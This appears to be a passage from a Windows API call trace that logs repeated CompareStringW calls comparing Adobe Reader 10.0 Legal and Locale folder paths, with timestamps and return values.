CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\", cchCount2=58) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\", cchCount2=58) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\", cchCount2=58) returned 3 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 2 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\", cchCount2=58) returned 3 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\", cchCount2=58) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\", cchCount2=58) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\", cchCount2=58) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount2=58) returned 2 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 2 [0081.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount2=58) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount2=58) returned 3 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount2=58) returned 2 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 2 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 1 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount2=61) returned 2 [0081.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount2=61) returned 2 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\", cchCount2=70) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\", cchCount2=70) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\", cchCount2=70) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\", cchCount2=70) returned 1 [0081.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 3 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 3 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 